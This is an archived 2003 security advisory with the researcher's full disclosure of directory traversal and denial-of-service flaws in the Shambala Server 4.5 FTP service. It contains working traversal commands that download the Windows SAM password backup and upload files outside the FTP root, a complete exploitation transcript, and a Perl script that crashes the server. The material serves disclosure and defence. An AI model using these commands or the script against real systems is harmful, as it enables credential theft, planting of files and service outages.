SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   Shambala Server Vendors:   Evolvable Corporation
Shambala Server FTP Input Validation Bugs Let Remote Authenticated Users View and Upload Files and Crash the Server
SecurityTracker Alert ID:  1005943
SecurityTracker URL:  http://securitytracker.com/id/1005943
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 18 2003
Impact:   Denial of service via network, Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information
Exploit Included:  Yes  
Version(s): 4.5
Description:   Several flaws were reported in the FTP server component of Shambala Server. A remote authenticated user can view and upload arbitrary files. A remote authenticated user can also cause the server to crash.

It is reported that the FTP server component does not filter "\.." and "/.." character sequences from certain user-supplied command requests. A remote authenticated user, including an anonymous FTP user, can view files on the system located outside of the FTP document directory. A demonstration exploit command is provided:

get \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\sam._

A remote authenticated user can also upload an arbitrary file to a location outside of the FTP document directory. A demonstration exploit command is provided:

send pwd.pl \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\test.pl

A more detailed demonstration exploit transcript is provided in the Source Message.

A remote user can also cause the FTP service to crash by sending the following command:

CWD /

Impact:   A remote authenticated user, including an anonymous FTP user, can view arbitrary files on the system. A remote authenticated user may be able to upload arbitrary files to arbitrary locations on the server. A remote authenticated user can cause the server to crash.
Solution:   No solution was available at the time of this entry. According to the report, the vendor does not regard these as flaws.
Vendor URL:  www.evolvable.com/ (Links to External Site)
Cause:   Exception handling error, Input validation error
Underlying OS:  Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] Multible vulnerabilities found in Shambala Server version 4.5




	             Multible vulnerabilities found in 
			Shambala Server version 4.5
			       (FTP Service)
		                                         
                           Discovered by Dennis Rand
                            www.Infowarfare.dk
------------------------------------------------------------------------


SUMMARY

Shambala is an easy to use communications server featuring the ability to 
serve and access web sites, ftp sites, and chat rooms. 
Using Shambala, you can quickly create a web site and host it from any PC. 
Shambala doesn't require NT and its installation is non-invasive. 
Shambala features a WYSIWYG DHTML editor for placing text and props on your 
web pages. 
The editor includes a navigation feature that allows you to express your web 
site as a 
geographical area and allow your users to move easily between areas. This 
feature also 
exists in the editor so you can create a space quickly without worrying about 
maintaining hyperlinks between areas. Shambala is drag and drop based allowing 
you 
to perfectly size and position your web page elements. 
You can use a page you are editing as an interactive whiteboard and chat 
space. 
When you move a prop or edit text, people connected to your workspace will 
receive 
the change that you make. Their workspace is automatically updated to be a 
mirror 
image of yours. If any machine in the group decides to leave, nothing is lost 
since 
each subscriber receives a full copy of the web page document being used as a 
workspace. 
This powerful feature can be used for interactive classrooms, games, 
demonstrations, 
even internet based group workshops. 
To transfer files, Shambala has an integrated ftp client and ftp server. The 
ftp server 
provides high performance access to shared files. You can also manage the 
security of the 
ftp site. The client can browse, download, and upload files to any ftp server. 
It can even automatically download everything on a remote ftp site. 
Shambala pushes the envelope of what you can do with web technology. It 
supports 
the existing infrastructure of the web but also provides powerful features 
that 
allow you to shape the future and evolution of cyberspace.

A directory traversal vulnerability in the product allows remote attackers to 
cause 
the server to traverse into directories that reside outside the bounding 
FTP root directory. The server is also Vulnerable for DoS attack.

DETAILS

Vulnerable systems:
 Windows NT 4.0 and Windows 2000 server fully patched
 *  Shambala Server version 4.5
 
Immune systems:
 * None Shambala Will not fix any errors they don't think there is any 
problems.

Shambala Server failure to filter out "\.." and "/.." sequences in specific 
command requests 
allowing a remote users to break out of restricted directories and gain read 
access 
to the system directory structure; Possibility for discovering the directory
structure outside the configured areas, It is also possible to get files from 
outside
the configured areas, and the part that could be even worse is that you can 
send files
to places outside the configures areas, so a trojan could be placed.


The following transcript demonstrates a sample exploitation of the 
vulnerabilities:


C:\>ftp
ftp> open
To 192.168.1.199
Connected to 192.168.1.199.
220 winnt40 - Shambala FTP Server Ready.
User (192.168.1.199:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> ls
200 PORT command successful.
150 Opening data connection.
192.168.1.199
index-_-1_0_0.htm
index-_0_0_0.htm
index-_0_1_0.htm
pwd.pl
226 Transfer complete.
ftp: 78 bytes received in 0,00Seconds 78000,00Kbytes/sec.
ftp> cd ..
550 Requested action not taken. Permission denied.
ftp> cd /
257 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening data connection.
192.168.1.199
index-_-1_0_0.htm
index-_0_0_0.htm
index-_0_1_0.htm
pwd.pl
226 Transfer complete.
ftp: 78 bytes received in 0,00Seconds 78000,00Kbytes/sec.
ftp> cd \..\
550 Requested action not taken. Permission denied.
ftp> ls
200 PORT command successful.
150 Opening data connection.
192.168.1.199
index-_-1_0_0.htm
index-_0_0_0.htm
index-_0_1_0.htm
pwd.pl
226 Transfer complete.
ftp: 78 bytes received in 0,01Seconds 7,80Kbytes/sec.
ftp> ls \..\..\..\..\..\..\..\..\..\..\
200 PORT command successful.
150 Opening data connection.
AUTOEXEC.BAT
CONFIG.SYS
I386
Inetpub
Installationsfiler til Windows Update
Multimedia Files
OptionPack
pagefile.sys
Program Files
pwd.pl
Shambala Server 4.5
TEMP
WINNT
226 Transfer complete.
ftp: 181 bytes received in 0,03Seconds 6,03Kbytes/sec.
ftp> ls \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\
200 PORT command successful.
150 Opening data connection.
autoexec.nt
config.nt
default._
ntuser.da_
sam._
security._
setup.log
software._
system._
226 Transfer complete.
ftp: 99 bytes received in 0,06Seconds 1,65Kbytes/sec.
ftp> get \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\sam._
200 PORT command successful.
150 Opening data connection.
226 Transfer complete.
ftp: 3196 bytes received in 0,00Seconds 3196000,00Kbytes/sec.
ftp> send pwd.pl \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\test.pl
200 PORT command successful.
150 Opening data connection.
226 Transfer complete.
ftp: 3849 bytes sent in 0,00Seconds 3849000,00Kbytes/sec.
ftp> bye
221 Goodbye.

The second attack type is a DoS attack that will kill the server application.
-------------------------------------   Cut Here ------------------------------
------------
#!/usr/bin/perl
#
# Shambala Server version 4.5
# http://www.evolvable.com
# Dennis Rand - matrix@infowarfare.dk
#
# What happends when this exploit is send the server crashes
# with a error message on the server.
#
#          __________________________
#         | Run-time error '20127':  |
#         |Invalid ConnectionID      |
#         ----------------------------
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# 
#
use Net::FTP;

    
$target = shift() || die "usage: target ip";
my $user = "anonymous";
my $pass = "mail\@mail.com";

system('cls');
print "Shambala Server version 4.5 DoS attack\n";
print "Trying to connect and destroy target system at: $target...\n";
$ftp = Net::FTP->new($target, Debug => 1, Port => 21) || die "could not 
connect: $!";
$ftp->login($user, $pass) || die "could not login: $!";
$ftp->cwd("/");
$ftp->quit;
-------------------------------------   Cut Here ------------------------------
------------

Detection:
Shambala Server version 4.5 is vulnerable to the above-described attacks. 
Earlier versions may be susceptible as well. To determine if a specific 
implementation is vulnerable, experiment by following the above 
transcript. 

Vendor response:
Shambala Server version 4.xx fixes this issue. The latest version is 
available from  http://www.evolvable.com


Disclosure timeline:
18/11/2002 Found the Vulnerability.
19/11/2002 Author notified. Send mail to webmaster@evolvable.com and 
help@evolvable.com
18/01/2003 Responses received from evolvable
18/01/2003 Public Disclosure.


ADDITIONAL INFORMATION
The vulnerability was discovered by <mailto:matrix@infowarfare.dk> Dennis Rand

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 




-------------------------------------------------
This mail sent through IMP: http://horde.org/imp/


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC